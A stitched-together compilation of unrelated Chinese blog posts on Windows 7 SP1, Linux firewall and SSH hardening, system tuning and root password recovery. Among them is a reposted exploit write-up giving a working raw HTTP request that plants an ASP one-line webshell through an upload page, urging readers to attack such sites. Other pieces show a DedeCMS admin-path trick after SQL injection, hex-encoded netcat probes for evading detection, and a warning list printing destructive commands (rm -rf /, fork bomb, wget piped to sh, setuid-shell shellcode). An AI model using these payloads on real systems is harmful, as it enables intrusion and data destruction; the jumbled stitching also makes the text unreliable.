详解Windows 7 SP1 RC版新增功能

微软日前发布了Windows7/Server2008R2SP1的RC候选版本，在下载说明中，微软再次重申SP1中新增的功能只有两项与WindowsServer2008R2相关的虚拟化技术：RemoteFX、动态内存（DynamicMemory）。windows7SP1则能帮助PC机利用上述基于服务器的功能，并没有新增其它功能。

　　如此说来，我们就要重视这两个功能，今天我们将微软关于这两个功能的官方描述汇总一下，希望能让大家对这两个功能有初步的认识。

　　首先，RemoteFX是微软桌面虚拟堆栈的最新功能，使用该功能可以获取更丰富更透明的桌面虚拟化体验。RemoteFX功能独立于其它所有图形堆栈并且支持所有显示内容，包括Silverlight或Flash内容。它通过USB重定向增强了终端用户的硬件体验，由于使用了虚拟图形资源，RemoteFX适用于大量设备，你可以将其部署在厚客户端和瘦客户端上，并且兼容大范围的网络配置。

　　那么RemoteFX是否与远程桌面服务存在差别？两者如何实现集成？对于这个问题，微软解释说：“RemoteFX描述了一组富媒体功能，使用远程桌面服务平台的用户可利用这些功能来部署基于虚拟机或会话的远程桌面基础结构。具体而言，RemoteFX增强了远程桌面服务中的远程桌面协议（RDP），使远程办公人员可以访问任意类型的应用程序或屏幕内容（包括富媒体和三维应用程序），从而提高最终用户的工作效率。”

　　动态内存是windowsServer2008R2中队Hyper-V功能的增强，帮助IT管理员集中管理物理主机上的所有可用内存，并动态分配给虚拟机。也就是说根据工作量的改变，你的虚拟机可以及时获得新的内存，而不需要中断服务。

　　从其描述中你也许会猜测，该功能是否也会出现在微软Hyper-VServer产品呢？是的，答案是肯定的。微软在最新的官方文档中指出：“MicrosoftHyper-VServer2008R2中会提供动态内存功能。”

Rainy'Fox

基于端口，使用iptables的connlimit模块

iptables -I INPUT -p tcp –syn –dport 22 -m connlimit –connlimit-above 2 -j REJECT

一条指令即可以搞掂， –connlimit-above 2表示只允许一个客户开启二个会话,与sshd_config 设置的区别，sshd_config只能设定一个用户最多尝试几次密码

同样也可以设定web服务访问设限

iptables -I INPUT -p tcp –syn –dport 80 -m connlimit –connlimit-above 30 -j REJECT
这样即可

用putty测试，开启到第三字，显示网络不可用

方法1：在/etc/pam.d/sshd文件第一行加入
auth required pam_listfile.so item=user sense=allow file=/etc/sshusers
onerr=fail
然后在/etc下建立sshusers文件,编辑这个文件,加入你允许使用ssh服务的用户名,不用重新启动sshd服务。

方法2：pam规则也可以写成deny的
auth required pam_listfile.so item=user sense=deny file=/etc/sshusers
onerr=succeed

方法3：在sshd_config中设置AllowUsers，格式如
AllowUsers a b c
重启sshd服务，则只有a/b/c3个用户可以登陆

 

安装

系统装好后进行必要的配置，或者使用闪电配置命令：
$sdo apt-get install ubuntu-restricted-extras

By:rubbish
特征:login.asp能看到版权,不过有些箱子把这个地址改求了.另外主目录下存在一个wsidny.asp
整套程序过滤什么的灰常的严密,看得出来是专业的安全人士写的,唯一可以利用的地方就在这个wsidny.asp
看代码:
<!-- #include file="conn.asp"-->
<%
    Server.ScriptTimeout = 36000
   PostSize = Request.TotalBytes
if postsize=0 then
response.End()
end if
    BytesRead = 0        
     ReadSize=256
     HeadSize=256
     filename = Request.BinaryRead(ReadSize)
     BytesRead = BytesRead + ReadSize        
    PostData = Request.BinaryRead(PostSize - BytesRead)
    StoreFile(filename)
Function Bytes2bStr(vin)
if lenb(vin) =0 then
        Bytes2bStr = ""
        exit function
end if
 Dim BytesStream,StringReturn
 set BytesStream = Server.CreateObject("ADODB.Stream")
 BytesStream.Type = 2
 BytesStream.Open
 BytesStream.WriteText vin
 BytesStream.Position = 0
 BytesStream.Charset = "gb2312"
 BytesStream.Position = 2
 StringReturn = BytesStream.ReadText
 BytesStream.close
 set BytesStream = Nothing
 Bytes2bStr = StringReturn
End Function
Function StoreFile(filename)
filea=Bytes2bStr(filename)
filea=LCase(filea)
if instr(filea,".")>0 then
fileb=split(filea,".")
num2=ubound(fileb)
if instr("jpg|gif|jpeg|png|bmp",fileb(num2))>0 then
filea=filea
else
filea=filea;".gif"
end if
else
filea=filea;".gif"
end if
Path=server.MapPath(imgFolder;filea)
Set oFileStream = CreateObject ("ADODB.Stream")
  oFileStream.Type = 1
  oFileStream.Mode = 3
  oFileStream.Open
    oFileStream.Write(PostData)
  oFileStream.SaveToFile Path,2
  oFileStream.Close
  Set oFileStream = Nothing
End Function
    Response.Write PostSize
    Response.Write " bytes were read."        
%>没搞懂这个页面是用来干什么的,可能是生成图片破密保的吧.一开始是想本地构造表单直接提交,上传带;的图片马,结果因为是Request.BinaryRead取的数据,所以urlencode过的参数都取不出来.改用vbs发包.这里又有个问题,因为路径是取的前256个字符,超过了后面server.MapPath所支持的最大长度,于是想到了用\00截断,把vbs发送的http请求抓出来,用ue写截断,然后提交,去掉包含文件测试成功.但是带包含的时候还报错.因为前面的conn.asp包含了一个fsql.asp防注页面,检查了request.form,调用了request.form之后就不能再调用Request.BinaryRead了否则会报错.那这个页面的意义何在?
在这里纠结了好久,试着去掉http头里的Content-Type: application/x-www-form-urlencoded,提交,发现竟然上传成功鸟,这才发现自己以前一直SB了.去掉这一个头,iis就会认为没有用表单格式提交的参数,这样用request.form就不会收到任何数据,也就不会跟后面的Request.BinaryRead冲突了
下面发利用方法:
POST /DNFZONX/wsidny.asp HTTP/1.1
Accept-Language: zh-cn
Content-Length: 284
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1)
Host: xxx.fuck.com
Connection: Keep-Alive
a.asp aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<%execute request("value")%>
一句话代码前面要构造到256个字符,然后在ue里面把空格用\00代替,改下主机头啥的,NC提交,看到返回xxx bytes were read.的话,就成功了,目标文件夹下img/a.asp就是了,如果图片目录找不到或者不可执行啥的,可以用../什么的跳出来就好了,只要保证一句话前面刚好有256个字符就是了
本地测试成功,大家遇到箱子信封什么的,就使劲的日吧!
{本文转自普瑞斯特博客-原文地址:http://www.hacksb.cn/post/156.html}

　黑客的聪明并不只是在于他们知道如何去入侵服务器，还在于他们知道如何去伪装自己的攻击。恶意的攻击者会使用多种逃避的手段来让自己不会被检测到，所以作为系统管理员，也应当了解这些手段以应付可能发生的攻击。
　　
　　这篇文章的主要目的不是揭示黑客新的攻击手法，而是对那些黑客所用到的逃避检测的手法以及他们可能留下的证据做描述。这些手段的欺骗性很大，所以想检测到它们也更加的困难。
　　
　　网络服务器
　　
　　我们的实验环境使用两种最常用的网络服务器，Apache和微软的InternetInformationServer(IIS)。我们在RedHatlinux上运行Apache1.3.9,在windowsNT4.0上运行IIS4.0。并且两种都采用普通和允许SSL的版本，所以我们可以对加密和未加密的服务器的攻击做测试。
　　
　　16进制编码
　　
　　一种最简单的将攻击伪装的手段就是修改URL请求。作为管理员,我们一般会在日志文件中查找某些字符串，或是一些普通文本的字符集。例如我们在请求中查找匹配已知漏洞的字符串。例如，我们在我们的IIS服务器中发现了如下的字符串，我们就知道有人正在查找是否有IIS中可以远程利用的MDAC漏洞：
　　
　　06:45:2510.0.2.79GET/msadc/302
　　
　　要知道攻击者是如何躲过这种匹配检测的，请参考以下作为恶意攻击者策略一部分的请求。要确定msadc目录是否存在，攻击者可能键入以下内容：
　　
　　[root@localhost/root]#nc-n10.0.2.5580
　　
　　GET/msadcHTTP/1.0
　　
　　这就会产生我们以上所见的日志文件。攻击者可以将请求进行十六进制的ASCII字符编码。在以上的例子中，字符串msadc在十六进制编码以后就会变为6D73616463。你可以使用windowsCharmap程序来快速的进行字符的ASCII到十六进制的转换。以上的HTTP请求，将字符串msadc用十六进制编码以后，就变成了：
　　
　　[root@localhost]#nc-n10.0.2.5580
　　
　　GET/%6D%73%61%64%63HTTP/1.0
　　
　　IIS的日志文件显示：
　　
　　07:10:3910.0.2.31GET/msadc/302
　　
　　应当注意的是，虽然采用了十六进制编码的手段，但是所产生的日志和没有使用十六进制编码的URL产生的是一样的。所以在这个例子里，编码并没有帮助攻击者逃避检测。但是，如果我们看看看Apache的日志情况，那么就是另外一个情形了。以下列出了攻击者使用来搜索某个cgi脚本的命令，后面跟着的是使用十六进制编码以后的同样命令:
　　
　　[root@localhost]#nc-n10.0.0.280
　　
　　HEAD/cgi-bin/test-cgiHTTP/1.0
　　
　　[root@localhost]#nc-n10.0.0.280
　　
　　HEAD/%63%67%69-bin/test-%63%67%69HTTP/1.0
　　
　　现在我们来查看一下access_log文件：
　　
　　10.10.10.10--[18/Oct/2000:08:22:47-0700]"HEAD/cgi-bin/test-cgiHTTP/1.0"2000
　　
　　10.10.10.10--[18/Oct/2000:08:23:47-0700]"HEAD/%63%67%69-bin/test-%63%67%69HTTP/1.0"2000
　　
　　首先应注意到的是在这两个例子中都是200代码说明命令完成成功。但是在第二中情况中，日志中出现的是十六进制的值而不是明文的。如果我们是依赖于形式来对这种攻击进行检测的话，那么我们是不可能检测到所发生的攻击的。许多的入侵检测系统使用的格式匹配技术智能化都不高，并且有些产品不会将十六进制的URL转换过后进行匹配。但是不论所使用的入侵检测软件是否能够对十六进制的代码进行转换，所有的网络管理员都应当对这种伎俩有所了解。
　　
　　代理服务器
　　
　　因为对攻击者而言完全隐藏攻击行为是很难做到的，所以掩盖攻击的真实来源也就成为相当重要的课题了。如果黑客可以隐藏他的源IP地址的话，那么他就可以在不用担心被抓住的情况下进行攻击。而黑客用来隐藏他们的源IP地址的一种手段就是使用代理服务器。
　　
　　代理服务器是被合法的用来从一个单一的访问点转发多种协议的。一般来说，内部用户必须通过代理服务器才能访问Internet，因此管理员就可以在代理服务器指定外部访问以及内部访问的限制策略。用户首先是和代理服务器建立连接，然后代理服务器就将连接请求转发到真正的目的地址。目的地址会记录下代理服务器的IP地址以作为请求的源地址，而不是最初发出请求的系统的IP地址。
　　
　　但是不幸的是代理服务器在Internet上的放置太随意了。(可以查看Proxys-4-All来获得这些错误配置机器的列表。)这些服务器经常会存在配置错误使得Internet用户可以连接到这些代理服务器上。一旦某个Internet用户通过代理服务器连接到某个服务器上，该服务器就会将代理服务器的IP地址作为发出请求的源地址记录在日志中。而在被攻击服务器的日志中对攻击者的记录其IP地址是属于一个没有任何攻击行为的“无辜”主机的，而不是攻击者的真正地址。我们来看以下的例子。
　　
　　下面的例子显示了黑客的攻击和攻击在日志中产生的相关信息。
　　
　　攻击者
　　
　　[root@10.1.1.1/]#nc-v10.8.8.880
　　
　　HEAD/HTTP/1.0
　　
　　日志文件
　　
　　10.1.1.1--[18/Oct/2000:03:31:58-0700]"HEAD/HTTP/1.0"2000
　　
　　在下面这种情况中，我们看到攻击者达到了同样的目的，但是这次他使用了代理服务器。
　　
　　攻击者
　　
　　[root@10.1.1.1/]#nc-v216.234.161.8380
　　
　　HEAD

 

有时在通过注射得到织梦程序的管理密码时，却发现找不到后台地址。。

 

这个时候 大家可以尝试下在地址后面加上：/include/dialog/select_media.php?f=form1.murl


但不一定通杀。。

By:cast

 

使用cpan自动安装

　　启动：perl -MCPAN -e shell

　　启动后提示符显示 cpan>

　　第一次启动要设置很多东西，如果网络没有防火墙什么的一路回车，到最后选一下最近的“源”就好了。如果有防火墙或自己要设置代理，过程中自己看英文提示吧。

　　安装命令如下：install 模块名

　　install Net::SSH::Perl

　　install Net::SSH::Expect

　　install Expect

　　.....

　　如果要修改连接源的列表

　　///////////////////////////////////////////////

　　o conf urllist

　　查看当前“源”列表

　　o conf urllist shift

　　删除“源”列表中最后一个url

　　o conf urllist unshift www.perl.com/CPAN/

　　添加url到“源”列表

　　///////////////////////////////////////////////////

iptables是Linux内核带的防火墙，结合linux强大的路由功能，可以实现达到非常出色的性能并能满足大部分企业使用的要求。下面我就用一个常用的案例说明一下。

一、网络拓扑图
 下面是示例中使用的架构：

如果您使用linux,可千万要记得不要让傻孩子们敲入以下命令,尽管这些命令看上去相当复杂,但还是会对你的系统造成严重影响.
有一些会影响你的程序和系统运行,有一些会直接把你的盘抹掉,这些命令几乎没有什么可以挽回的余地.

1. Code:


rm -rf /

这个很简单,根目录会被擦光.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


没看懂?呵呵,其实就是16进制的[rm -rf /].

3. Code:

mkfs.ext3 /dev/sda


抹盘行为无疑是危险的

4. Code:

:(){:|:;};:


这不是90后的表情,也不是托蒂射点球前的表情,它可以让你的系统迅速因为处理大量数据而死机.

5. Code:

any_command > /dev/sda


这个命令将会写入大量的RAW数据,可以导致数据丢失.

6. Code:

wgethttp://some_untrusted_source -O- | sh

和windows一样,千万不要乱下载未经证实安全性的源,这年头linux和胡萝卜一样,也不会保险.

7. Code:

mv /home/yourhomedirectory/* /dev/null


这条命令无疑会让系统抓狂,你的主目录会再也看不到.a

作为一个系统管理员，我下面说的都是基于服务器应用的linux来谈的，由于个人电脑上使用linux也许不是像服务器上一样，优先追求安全和稳定，因此个人电脑使用的朋友只做个参考吧。

　　本文提及的系统，如没有特别声明，均采用redhat公司的redhat linux系统。

　　关于优化

　　说起优化，其实最好的优化就是提升硬件的配置，例如提高cpu的运算能力，提高内存的容量，个人认为如果你考虑升级硬件的话，建议优先提高内存的容量，因为一般服务器应用，对内存的消耗使用要求是最高的。当然这都是题外话了。

　　这里我们首要讨论的，是在同等硬件配置下(同一台服务器，不提升硬件的情况下)对你的系统进行优化。

　　作为系统管理员，我认为，首先我们要明确一个观点:在服务器上作任何操作，升级和修改任何配置文件或软件，都必须首要考虑安全性，不是越新的东西就越好，这也是为什么linux管理感觉上和windows有所不同的地方，windows首先推荐大家去使用它的最新版本软件和操作系统，其实我个人认为这是一种商业行为，作为从系统管理上来讲，这是很不好的，使用新的软件和系统可能带来新的问题，有些甚至是致命的。

　　因此，作为管理，我们还是应该考虑稳定的长期使用的软件版本来作为我们的版本，具体的好处我就不多说了。相信作为管理员的你应该知道的。

　　其实个人使用的linux最直接的一个优化就是升级内核，自己编译的内核是根据自己的系统编译而来，将得到最大的性能和最小的内核。

　　但是，服务器就不太一样了，当然我们也希望每一台服务器都是自己手工编译的内核，高效而精巧。但是实际和愿望是有差距的，试想一下，如果你管理100来台linux主机，而每一台也许配置都不一样，那编译内核的一个过程将是一个浩大工程，而且从实际考虑，工作量大得难以想象。我想你也不会愿意做这种事情吧。因此，个人建议，采用官方发布的内核升级包是很好的选择。

　　首先，我们对新安装的系统，将做一系列升级，包括软件和内核，这是很重要的步骤，(这方面的详细情况欢迎察看我另一篇关于升级方面的文章)。

　　在升级好所有软件后，基本的防火墙和配置都做好以后，我们开始优化一些细节配置，如果你是老系统，那么在作本问题及的一些操作和优化你系统之前，务必被备份所有数据到其他介质。

　　1、虚拟内存优化

　　首先查看虚拟内存的使用情况，使用命令

　　# free

　　查看当前系统的内存使用情况。

　　一般来说，linux的物理内存几乎是完全used。这个和windows非常大的区别，它的内存管理机制将系统内存充分利用，并非windows无论多大的内存都要去使用一些虚拟内存一样。这点需要注意。

　　linux下面虚拟内存的默认配置通过命令

　　#cat/proc/sys/vm/freepages

　　可以查看，显示的三个数字是当前系统的:最小内存空白页、最低内存空白页和最高内存空白。

　　注意，这里系统使用虚拟内存的原则是:如果空白页数目低于最高空白页设置，则使用磁盘交换空间。当达到最低空白页设置时，使用内存交换(注:这个是我查看一些资料得来的，具体应用时还需要自己观察一下，不过这个不影响我们配置新的虚拟内存参数)。

　　内存一般以每页4k字节分配。最小内存空白页设置是系统中内存数量的2倍;最低内存空白页设置是内存数量的4倍;最高内存空白页设置是系统内存的6倍。这些值在系统启动时决定。

　　一般来讲在配置系统分配的虚拟内存配置上，我个人认为增大最高内存空白页是一种比较好的配置方式，以1G的内存配置为例:

　　可将原来的配置比例修改为:

　　204840966444

　　通过命令

　　# echo"204840966444" > /proc/sys/vm/freepages

　　因为增加了最高空白页配置，那么可以使内存更有效的利用。

　　2、硬盘优化

　　如果你是scsi硬盘或者是ide阵列，可以跳过这一节，这节介绍的参数调整只针对使用ide硬盘的服务器。

　　我们通过hdparm程序来设置IDE硬盘，

　　使用DMA和32位传输可以大幅提升系统性能。使用命令如下:

　　#/sbin/hdparm -c 1 /dev/hda

　　此命令将第一个IDE硬盘的PCI总线指定为32位，

　　使用 -c 0参数来禁用32位传输。

　　在硬盘上使用DMA，使用命令:

　　# /sbin/hdparm -d 1 /dev/hda

　　关闭DMA可以使用 -d 0的参数。

　　更改完成后，可以使用hdparm来检查修改后的结果，使用命令:

　　# /sbin/hdparm -t /dev/had

　　为了确保设置的结果不变，使用命令:

　　# /sbin/hdparm -k 1 /dev/hda

　　Hdparm命令的一些常用的其他参数功能

　　-g 显示硬盘的磁轨，磁头，磁区等参数。

　　-i 显示硬盘的硬件规格信息，这些信息是在开机时由硬盘本身所提供。

　　-I 直接读取硬盘所提供的硬件规格信息。

　　-p设定硬盘的PIO模式。

　　-Tt 评估硬盘的读取效率和硬盘快取的读取效率。

　　-u<0或1> 在硬盘存取时，允许其他中断要求同时执行。

　　-v 显示硬盘的相关设定。

　　3、其他优化

　　关闭不需要的服务，关于系统自动启动的服务，网上有很多资料，在此我就不赘述了;

　　关于安全

　　1、安全检查

　　作为一个系统管理员来说，定期对系统作一次全面的安全检查很重要的，最近遇到一些朋友来信说出现了一些莫名其妙的问题，例如最大的一个问题就是明显感觉网络服务缓慢，这极有可能是被攻击的现象。实践证明，无论是那种系统，默认安装都是不安全的，实际不管你用windows也好，linux,bsd或其他什么系统，默认安装的都有很多漏洞，那怎么才能成为安全的系统呢，这正是我们系统管理人员需要做的事情。配置配置再配置。任何系统，只要细心的配置，堵住已知的漏洞，可以说这个系统是安全的，其实并非很多朋友说的那样，安装了系统，配置了防火墙，安装了杀毒软件，那么就安全了，其实如果对系统不作任何安全设置，那就等于向黑客敞开一扇纸做的大门，数十分钟就能完全控制!

　　这并非骇人听闻。

　　作为linux系统，同样存在很多漏洞，黑可能利用这些漏洞控制你的整个系统，要防止这些问题，我们需要做以下步骤:

　　1、 升级系统中所有软件包的最新版本;

　　2、 设置较为强壮的防火墙;

　　3、 定期检查关键记录文件，配置杀毒软件

　　4、 多关心一下发布安全信息警告的网站，掌握一些最新的病毒和黑客程序的特点，这些都利于系统的正常运作。

　　这篇文章主要以优化为主，为了配合这一主题，安全部分我们只讨论一下日常的一些维护工作。

　　除了上面列出的4条是管理员必修之课外，对一些linux系统细节的维护也很重要。

　　包括:

　　1、 配置日志轮训工具，定期下载备份日志，是个非常好的习惯，这样不但能减少日志的消耗的磁盘空间，提高系统效率，更能及时发现问题，linux下有些很好的系统日志分析器，能直接提取日志中的特殊项目，省去了阅读日志的烦恼;

　　2、 使用命令lsof –i ,netstat –a ,ps –e等命令，定期检查系统服务端口监听等情况，也可制作一个定期执行的脚本，将这些命令定期执行后发到邮箱中;

　　3、 定期检查root用户的history列表，last列表，vipw用户列表是否正常;

　　4、 定期备份文件，用tar命令就能很好的备份了，当然需要下载这些备份并转移介质;

　　如一点发现有任何特别的没见过的情况或端口，那么要引起足够的重视，切勿因小失大。

　　以上是我对linux系统安全和优化的一些浅显认识，希望大家都能安全高效的使用linux为你的工作生活带来方便。

 

修改防火墙配置需要修改 /etc/sysconfig/iptables 这个文件，如果要开放哪个端口，在里面添加一条。

-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1521 -j ACCEPT

就可以了，其中 1521 是要开放的端口号，然后重新启动linux的防火墙服务。

停止/启动防火墙服务的命令：

用root登录后，执行

service iptables stop --停止

service iptables start --启动

(service命令位于/sbin)

防火墙规则只有在 iptables 服务运行的时候才能被激活。要手工启动服务，使用以下命令：

/sbin rvice iptables restart

要确保它在系统引导时启动，使用以下命令：

/sbin/chkconfig --level 345 iptables on

ipchains 服务不能和 iptables 服务同时运行。要确定 ipchains 服务被禁用，执行以下命令：

/sbin/chkconfig --level 345 ipchains off

 

1）使用root登录
　　
　　使用passwd root来修改root的密码，在系统设置的安全项中设定允许管理员登录
　　
　　2）远程控制:Xmanager3（图形界面）
　　
　　a：仅仅作为图形显示
　　
　　＃expore DISPLAY=IP:0.0
　　
　　#./runInstaller
　　
　　这样，oracle安装的图形界面就显示到了你所设置的ip上
　　
　　b：远程登录
　　
　　修改/etc/gdm/gdm.conf
　　
　　[daemon]项下的RemoteGreeter=/usr/lib/gdm/gdmlogin行前的＃去掉
　　
　　[xdmcp]项下的Enable=false改为Enable=ture
　　
　　修改/etc/gdm/gdm.conf-custom,内容如下：
　　
　　[daemon]
　　
　　DefaultSession=gnome.desktop
　　
　　RemoteGreeter=/usr/lib/gdm/gdmgreeter
　　
　　[security]
　　
　　DisallowTCP=false
　　
　　AllowRoot=true
　　
　　AllowRemoteRoot=true
　　
　　[xdmcp]
　　
　　Enable=true
　　
　　[gui]
　　
　　GtkRC=
　　
　　[greeter]
　　
　　DefaultFace=
　　
　　GlobalFaceDir=/usr/
　　
　　[chooser]
　　
　　[debug]
　　
　　[servers]
　　
　　重新启动，在Xmanager的Xbrowser中就可以看到了，双击即可打开登录界面
　　
　　3)远程控制putty(文字界面）
　　
　　putty控制很简单，但是由于文件内有中文字符，不认，所有设置了一下其字符
　　
　　确认配置如下：
　　
　　export LANG=zh_CN.UTF-8export LANGUAGE=zh_CN:zh

 

第一种：
　　
　　01假如要改SSH的默认端口（22），那么你只要修改：/etc/ssh/sshd_config中Port 22，这里把22改成自己要设的端口就行了，不过千万别设和现已有的端口相同哦，以防造成未知后果。
　　
　　02假如要限制SSH登陆的IP，那么可以如下做：
　　
　　首先：修改/etc/hosts.deny，在其中加入sshd:ALL
　　
　　然后：修改/etc/hosts.allow，在其中进行如下设置：sshd:192.168.0.241
　　
　　这样就可以限制只有192.168.0.241的IP通过SSH登陆上linux机器了。当然在做为服务器方面，我都不装gnome和KDE的，而且很多东西都不装，这样增加安全系数。
　　
　　第二种：
　　
　　首先修改配置文件
　　
　　vi /etc/ssh/sshd_config
　　
　　找到#Port 22一段，这里是标识默认使用22端口，修改为如下：
　　
　　Port 22
　　
　　Port 50000
　　
　　然后保存退出
　　
　　执行/etc/init.d/sshd restart
　　
　　这样SSH端口将同时工作与22和50000上。
　　
　　现在编辑防火墙配置：vi /etc/sysconfig/iptables
　　
　　启用50000端口。
　　
　　执行/etc/init.d/iptables restart
　　
　　现在请使用ssh工具连接50000端口，来测试是否成功。如果连接成功了，则再次编辑sshd_config的设置，将里边的Port22删除即可。
　　
　　之所以先设置成两个端口，测试成功后再关闭一个端口，是为了方式在修改conf的过程中，万一出现掉线、断网、误操作等未知情况时候，还能通过另外一个端口连接上去调试以免发生连接不上必须派人去机房，导致问题更加复杂麻烦。

 

如果因为忘了root口令导致无法登录系统，请试用下面的方法来改忘记的root口令：
　　
　　方法一：
　　
　　1、重新启动系统。待系统启动到grub或lilo（现在一般是grub）引导菜单时，找到系统当前引导项（可以按方向键展开隐藏的菜单）；
　　
　　2、把光标定位在该选项上按下字母“e”键进入这个引导的编辑状态；
　　
　　3、该选项有三行语句，请用光标选中第二行，也就是“Kernel”开头的 那一行；
　　
　　4、在这一行再按下字母“e”键进入这一行的编辑状态；
　　
　　5、在该行行尾加个空格，写上数字1，类似这样：
　　
　　kernel /boot/vmlinuz-2.6.9-11.19 ro root=LABEL=/ 1
　　
　　6、修改以后，按下“回车”键回到原来的界面；
　　
　　7、按下字母“b”键开始引导。
　　
　　这样，就可以启动linux的单用户模式，有点类似windows的安全模式，就是只启动最基本的系统，网络服务、系统服务等都不启动。单用户模式引导完成以后，会有#提示符，表示已拥有超级用户权限，然后请在#后执行命令：
　　
　　/usr/bin/passwd
　　
　　系统应该会提示输入口令，这个口令是不回显的，保证输入无误就可以了，回车后，系统会要求再输入一遍，输入要求一致，然后会看到口令修改成功的提示。再键入命令 init 3键入系统的字符界面模式下（系统会重新改变运行级别），看到login:提示，再重新试一试是否可以用root和刚刚修改过的口令登录。
　　
　　方法二：
　　
　　1、将系统光盘的第一张插入光驱，重新启动系统，从光驱成功引导后在boot: 后输入linux rescue回车。
　　
　　2、跟着引导程序向下走，不必配置网络。但提问是否手索并挂载系统分区时选择“是”，系统进入“＃”提示符下。
　　
　　3、执行命令chroot /mnt/sysimage/ （默认的系统会挂在/mnt/sysimage/目录下）
　　
　　4、执行命令/usr/bin/passwd来修改root口令。
　　
　　5、执行命令exit; ，取出光盘，重新启动系统。
　　
　　然后用新的口令登录系统，即可完成root密码修复。